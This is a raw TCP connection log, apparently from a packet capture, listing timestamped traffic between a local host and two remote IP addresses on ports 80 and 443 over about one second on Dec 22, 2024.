Dec 22, 2024 02:16:52.645330906 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.645421982 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.645528078 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.645571947 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.645850897 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.645894051 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.794949055 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.794977903 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.794992924 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.795001030 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.795021057 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.795027971 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.795217037 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.795259953 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.795325041 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.795341015 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.795363903 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.795382977 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.795526028 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.795562983 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.795713902 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.795789957 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.795794964 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.795814037 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.795834064 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.795844078 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.796009064 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.796044111 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.796506882 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.796542883 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.796559095 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.796576023 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.796596050 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.796611071 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.796987057 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.797039986 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.797082901 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.797100067 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.797138929 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.797300100 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.797338963 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.797832966 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.797893047 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.797916889 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.797933102 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.797996044 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.798139095 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.798190117 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.798662901 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.798679113 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.798695087 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.798719883 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.798749924 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.798932076 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.799357891 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.799407005 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.799442053 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.799458027 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.799501896 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.799714088 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.799762011 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.800169945 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.800237894 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.800254107 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.800282955 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.800298929 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.800455093 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.800503016 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.800930977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.800978899 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.801044941 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.801060915 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.801084995 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.801096916 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.801249981 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.801307917 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.801716089 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.801789045 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.801794052 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.801811934 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.801855087 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.802021980 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.802087069 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.802511930 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.802563906 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.802589893 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.802608967 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.802628994 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.802653074 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.802829027 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.802918911 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.803298950 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.803339005 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.803395987 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.803412914 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.803453922 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.803642988 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.803792000 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.804116964 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.804181099 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.804188967 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.804198980 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.804214001 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.804235935 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.804409981 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.804450035 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.804950953 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.804966927 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.804982901 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.804991007 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.805016994 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.805181026 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.805207968 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.805219889 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.805665016 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.805711985 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.805725098 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.805742025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.805767059 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.805778027 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.806018114 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.806063890 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.806469917 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.806504965 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.806520939 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.806546926 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.806579113 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.806725025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.807257891 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.807290077 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.807306051 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.807306051 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.807332039 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.807356119 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.807519913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.807566881 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.808033943 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.808077097 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.808078051 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.808094025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.808116913 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.808134079 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.808309078 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.808638096 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.808806896 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.808860064 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.808876038 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.808897018 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.808923960 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.809097052 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.809174061 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.809587955 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.809639931 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.809648037 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.809663057 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.809688091 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.809699059 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.809912920 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.809969902 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.810383081 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.810431004 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.810456991 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.810472965 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.810497999 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.810511112 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.810679913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.810755968 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.811130047 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.811181068 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.811244965 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.811261892 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.811306000 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.811466932 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.811929941 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.811979055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.812025070 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.812041998 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.812066078 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.812093019 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.812277079 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.812319040 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.812753916 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.812794924 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.812807083 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.812824965 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.812844038 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.812863111 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.813035011 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.813076973 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.813560963 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.813621044 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.813635111 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.813643932 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.813682079 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.829943895 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:52.829976082 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:52.830077887 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:52.830493927 CET	49885	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:52.830502987 CET	443	49885	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:52.837256908 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.837271929 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.837286949 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.837301970 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.837315083 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.837336063 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.837398052 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.837435007 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.837553978 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.837570906 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.837589979 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.837603092 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.837999105 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.838037014 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.838076115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.838130951 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.987241983 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.987268925 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.987287045 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.987309933 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.987360954 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.987400055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.987430096 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.987447023 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.987492085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.987627983 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.987669945 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.987828016 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.987921000 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.987936974 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.987958908 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.987987041 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.988147020 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.988626957 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.988673925 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.988734007 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.988749981 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.988790989 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.988950014 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.988993883 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.989392996 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.989492893 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.989509106 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.989542961 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.989568949 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.989706039 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.990190029 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.990242958 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.990287066 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.990303040 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.990345955 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.990730047 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.990771055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.990999937 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.991050005 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.991074085 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.991091013 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.991214991 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.991323948 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.991408110 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.991821051 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.991864920 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.991926908 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.991942883 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.991969109 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.991981030 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.992140055 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.992201090 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.992600918 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.992677927 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.992690086 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.992695093 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.992718935 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.992731094 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.992922068 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.992961884 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.993340015 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.993381023 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.993441105 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.993458033 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.993484974 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.993496895 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.993662119 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.993711948 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.994142056 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.994196892 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.994226933 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.994241953 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.994268894 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.994280100 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.994441032 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.994497061 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.994920015 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.994971991 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.995017052 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.995033979 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.995076895 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.995228052 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.995269060 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.995702028 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.995758057 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.995821953 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.995839119 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.995861053 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.995872974 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.996018887 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.996139050 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.996475935 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.996517897 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.996592045 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.996608019 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.996633053 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.996644974 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.996779919 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.996848106 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.005008936 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.005050898 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.005063057 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.005079985 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.005105019 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.005121946 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.005285978 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.005321026 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.005323887 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.005338907 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.005359888 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.005369902 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.005649090 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.005690098 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.005793095 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.005831957 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.005847931 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.005863905 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.005875111 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.005883932 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.005908012 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.005918980 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.006387949 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.006423950 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.006483078 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.006499052 CET	80	49872	31.41.244.11	192.168.2.4
